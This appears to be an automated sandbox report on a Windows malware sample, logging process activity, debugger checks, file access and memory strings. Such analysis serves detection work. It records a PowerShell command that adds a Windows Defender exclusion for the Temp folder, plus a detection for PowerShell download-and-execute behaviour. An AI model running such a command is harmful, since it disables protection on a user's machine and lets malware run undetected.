              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeWindow / User API: threadDelayed 5642Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6806Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2964Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3597Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 995Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7372Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2395Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeWindow / User API: threadDelayed 9197Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeWindow / User API: foregroundWindowGot 1759Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeAPI coverage: 5.1 %
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe TID: 6540Thread sleep count: 5642 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe TID: 6540Thread sleep time: -141050s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep count: 6806 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep count: 2964 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 3597 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 995 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6348Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep count: 7372 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep count: 2395 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe TID: 6108Thread sleep time: -91970s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeThread sleep count: Count: 9197 delay: -10Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00452492
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_004788BD
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,10_2_0045CAFA
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_0044BD27
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045DE8F FindFirstFileW,FindClose,10_2_0045DE8F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0044BF8B
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.tmpJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\AC2F.tmpJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmpJump to behavior
              Source: AHPOBS.exe, 0000000A.00000002.3916841714.0000000000BDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeAPI call chain: ExitProcess graph end nodegraph_10-88218
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045A370 BlockInput,10_2_0045A370
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,10_2_004238DA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0041F250 SetUnhandledExceptionFilter,10_2_0041F250
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041A208
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00417DAA

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_6340.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: Gq48hjKhZf.exe PID: 6396, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat, type: DROPPED
              Adds a directory exclusion to Windows Defender
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00436CD7 LogonUserW,10_2_00436CD7
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winmgmts:\\localhost\root\securitycenter2nymemstr_b8d3b324-b
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\ahpobs.exe:ymemstr_f98e1a26-3
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\sq8.dll/y<mmemstr_ef4e3c89-1
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\bass.dllmemstr_129df5f0-b
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\bacb.dllmemstr_a26b2d70-d
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\mozilla\mozilla firefox\memstr_cc7c46e6-2
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\baenc.dllmemstr_3fa5ef2b-9
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\lamx.exememstr_abcf264b-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^:ttomemstr_eb4d6805-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vvahkz'memstr_b0269655-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osversion^:ttmemstr_ac2b1694-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lojjxqikja^:ttmemstr_7a16264c-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lojjxqikjattitl_:tumemstr_48303b6b-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l^:ttmemstr_f6a07637-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_oke_versmemstr_781710bf-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rt^:ttmemstr_9f5b0361-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_error^:ttmemstr_86db0ad8-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_abort]:twmemstr_1f16b04e-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_interruptmemstr_3ef611b2-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws_ex_topmost\ memstr_0aaa531d-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yyrtrreeitety memstr_b4fc6356-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: em_scrollcaretr memstr_173326f2-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo_overwritetyo memstr_70bd54e7-0
